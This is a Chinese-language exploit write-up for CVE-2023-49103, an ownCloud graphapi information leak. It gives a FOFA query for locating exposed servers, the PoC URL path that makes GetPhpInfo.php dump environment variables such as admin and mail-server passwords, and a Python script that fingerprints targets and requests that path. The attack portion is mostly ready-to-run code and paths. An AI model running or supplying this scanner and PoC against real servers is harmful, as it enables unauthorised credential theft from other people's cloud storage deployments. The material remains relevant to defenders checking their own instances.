【CVE-2023-49103】ownCloud graphapi信息泄露漏洞(2023年11月发布)
漏洞简介
ownCloud owncloud/graphapi 0.2.x在0.2.1之前和0.3.x在0.3.1之前存在漏洞。graphapi应用程序依赖于提供URL的第三方GetPhpInfo.php库。当访问此URL时,会显示PHP环境的配置详细信息(phpinfo)。此信息包括Web服务器的所有环境变量,包括敏感数据,如ownCloud管理员密码、邮件服务器凭据和许可证密钥。
漏洞等级 | 高危 |
影响版本 | ownCloud/graphapi 0.2.x < 0.2.1 ownCloud/graphapi 0.3.x < 0.3.1 |
漏洞类型 | 信息泄露 |
产品简介
OwnCloud 是一个开源的私有云存储/网盘项目,OwnCloud 跨平台支持 Windows、Mac、Android、iOS、Linux 等平台,而且还提供了「网页版」以及 WebDAV 形式访问,因此你几乎可以在任何电脑、手机设备上都能轻松获取和访问你的文件文档,从而实现跨平台跨设备文件同步、共享、版本控制、团队协作等功能。
网络测绘
FOFA:app="ownCloud"
漏洞复现
手动验证POC
ip:port/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php
注意:当url存在/owncloud/时,poc需要将该路径保留
即POC为
ip:port/owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php
python扫描验证脚本
#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
"""
@Project :漏洞复现POC
@File :【CVE-2023-49103】ownCloud graphapi信息泄露漏洞.py
@Author :星之尘
@Date :2023/11/28 15:24
@脚本说明:
"""
import requests
from requests import Timeout
from urllib3.exceptions import InsecureRequestWarning
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
}
def verification(url):
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
if not url.startswith('http://') and not url.startswith('https://'):
url = 'http://' + url
path1 = "/index.php/login"
path2 = "/owncloud/index.php/login"
encodetext1 = url + path1
encodetext2 = url + path2
finger_url = [encodetext2, encodetext1]
for url in finger_url:
req1 = requests.get(url, headers=headers, verify=False, timeout=20)
if "ownCloud" in req1.text:
return url
return False
def scan():
verification_url = verification(url)
print(f"扫描目标: {verification_url}")
print("---------------------------------------------------")
try:
if "owncloud" in verification_url:
exp_path = "/owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php"
else:
exp_path = "/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php"
exp=url + exp_path
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
req2 = requests.post(exp, headers=headers, verify=False, timeout=20)
if req2.status_code == 200 and "phpinfo()" in req2.text:
print(f"[+] {url} !!!存在【CVE-2023-49103】ownCloud graphapi信息泄露漏洞!!!;")
else:
print(f"[-] {url} 不存在【CVE-2023-49103】ownCloud graphapi信息泄露漏洞")
except Timeout:
print(f"[!] 请求超时,跳过URL: {url}", "yellow")
except Exception as e:
if 'HTTPSConnectionPool' in str(e) or 'Burp Suite Professional' in str(e):
print(f"[-] {url} 证书校验错误或者证书被拒绝")
else:
print(str(e))
if __name__ == "__main__":
url = "your ip:port"
verification(url)
scan()